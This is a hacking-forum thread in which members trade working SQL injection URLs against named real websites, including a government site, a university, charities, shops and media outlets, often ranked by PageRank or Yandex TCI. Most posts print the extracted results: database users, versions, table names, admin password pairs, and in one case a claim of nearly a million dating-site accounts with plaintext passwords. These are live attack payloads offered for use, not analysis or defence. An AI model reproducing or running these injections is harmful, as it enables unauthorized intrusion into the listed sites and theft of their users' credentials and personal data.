SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. av1

    av1 Elder

    Code:
    http://www.bouldermicrofinance.org/_fra/index.php?page=f_curso&cnum=-26+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11--&len=FR
    Username: [email protected]
    Version: 5.1.39-log
    Database: profesores

    Google PR: 5
     
  2. av1

    av1 Elder

    Code:
    http://www.chartstats.com/release.php?release=-7259+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
    Username: [email protected]
    Version: 5.1.53-log
    Database: chartstats

    Google PR: 3
     
  3. m0r0

    m0r0 New Member

    For fans of the spicy stuff :)

    http://altomrc.dk/index.asp?list=category&page=2&cat_id=-302+and+1=0+union+all+select+1,concat_ws%280x3a,password,email,username%29,3,4+from+sexdating_no.sexdating_users+limit+0,1+--+

    From this DBMS you can pull user data for sexdating.de, sexdating.no, sexdating.su, and a bunch of other domains as well

    The injection shown above has more than 42,000 users. Close to a million users in total. All passwords are in plain text.
     
  4. fl00der

    fl00der Moderator

    Government
    http://www.plani[G00GLE]ficacion.catamarc[G00GLE]a.gov.ar/zomplog3.9/vernota.php?cod=-15+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,version(),12,13,14,15,16
     
  5. eclipse

    eclipse Member

    КИНОМАНИЯ.РУ, Yandex TCI - 1400
    Code:
    http://www.kinomania.ru/confirm/?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28MID%28Password,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29+--+&code=15541515
    
    ++++++++++++++++++++++
    kinomaniaru,
    u5012_123,
    u5012_dump,
    u5012_for,u1'
    kinomaniaru1
    ++++++++++++++++++++++
    [email protected]
    5.0.90-log1
     
  6. DJ4J

    DJ4J Member

    Code:
    http://wintech.org/bookdetails.php?bookid=-1+union+select+1,concat%28nickname,0x3a,pass%29,3,4,5,6,7+from+tbl_user%20--
    no idea where the admin panel is...
    5.x branch



    Code:
    http://www.service-js.jp/cms/show_news.php?id=-1+union+select+1,concat%28admin_user_name,0x3a,admin_user_pw%29,3,4+from+positive_admin_user+LIMIT+1,1--
     
    #13666 DJ4J, 22 Mar 2011
    Last edited: 22 Mar 2011
  7. A_n_d_r_e_i

    A_n_d_r_e_i Elder

    http://www.ultimatecarpage.com/show.php?num=-577+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+--
    TCI: 40
    PR: 5

    http://www.hccw.com/displayAttorney.php?num=-8+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--
    pr: 2

    http://www.domtomfr.com/commentaire.php?id=-1396+union+select+1,2,@@version,4,5+--
    TCI: 10
    pr: 4
     
    #13667 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 22 Mar 2011
  8. A_n_d_r_e_i

    A_n_d_r_e_i Elder

    http://www.ecss.bb/viewproduct.php?pid=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18+--

    http://frigonoor.com/viewproduct.php?pid=-25+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+--
     
    #13668 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 22 Mar 2011
  9. ubi

    ubi Elder

    http://www.thebitored.com/wordpress/wp-content/plugins/wp-forum/sendmail.php?action=quote&id=1%20union%20select%20version(),2,3%20--%20
     
  10. A_n_d_r_e_i

    A_n_d_r_e_i Elder

    http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,u_name,0x3a,u_pwd)+from+tbl_users+--
    a small web shop
    http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,user,0x3a,pwd)+from+tbl_admin+--


    http://www.bible-history.com/subcat.php?id=13+union+select+group_concat(0x3a3a,admin_username,0x3a,admin_password)+from+administrators+--
    cy:40
    pr:6
     
    #13670 A_n_d_r_e_i, 22 Mar 2011
    Last edited: 23 Mar 2011
  11. m0r0

    m0r0 New Member

    http://www.homelessuk.org/details.asp?id=UK5666'+and+1=0+or+1=(select+top+1+name+from+sysusers)+--+
     
  12. Фараон

    Фараон коКотэ Of Antichat

    http://www.cwmgalleries.biz/cwm_artist_bio.php?artist_id=-10113%20union%20select%20concat_ws(0x3a,host,user,password)%20from%20user--
     
  13. bloodAngel

    bloodAngel Banned

    Code:
    http://www.tornworld.net/forgotpassword.php
    Method Post :
    Code:
    +(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
    user : '_!@4dilemma:0'
     
    #13673 bloodAngel, 24 Mar 2011
    Last edited by a moderator: 24 Mar 2011
  14. ~d0s~

    ~d0s~ Banned

    sportbox.ru (official site of the Rossiya 2 TV channel)
    TCI - 3600
    PR - 6


    Code:
    http://sportbox.ru/rfpl/?archive=77+and+1=(select+version()||current_user)::int--
     
    #13674 ~d0s~, 24 Mar 2011
    Last edited: 24 Mar 2011
  15. AC//DC

    AC//DC Active Member

    http://homeidei.ru/index.php?link=6&id=-57%20and%201=2%20union%20select%20concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10+--
    the /temp/ directory was openly listable and writable; I wrote to the admin, that bug got fixed but the injection is still there)))
     
  16. Фараон

    Фараон коКотэ Of Antichat

    http://www.isrm.co.uk/jobs/job_details.php?job_id=-511%20union%20select%201,2,3,4,5,6,7,8--
     
  17. A_n_d_r_e_i

    A_n_d_r_e_i Elder

    http://www.floramarket.kiev.ua/price.php?id=-224+union+select+1,2,3,4,5,6,group_concat(table_name),8,9+from+information_schema.tables+--

    http://www.greenroofs.com/projects/pview.php?id=-476+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
     
    #13677 A_n_d_r_e_i, 24 Mar 2011
    Last edited: 24 Mar 2011
  18. m0r0

    m0r0 New Member

    http://users.unimi.it/discanti/personale/scheda.php?id_utente=-106 and 1=0 union all select 1,2,3,concat_ws(0x3a,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from db_discanti.utenti limit 0,1 --

    Google PR: 8

    admin2019:admin:

    82 users in total. Passwords in plain text.
     
  19. m0r0

    m0r0 New Member

    http://www.radiococa.com/noticias.php?id=373 and 1=0 union all select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8 --

    Google PR: 2

    4.1.18-nt:arundanet_radiococa:usercoca@localhost
     
  20. Lijzer

    Lijzer Member

    http://www.facom-tools.co.uk/product_detail.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8+--+
    nt:facom_2008:facom_db@localhost
    PR 4
     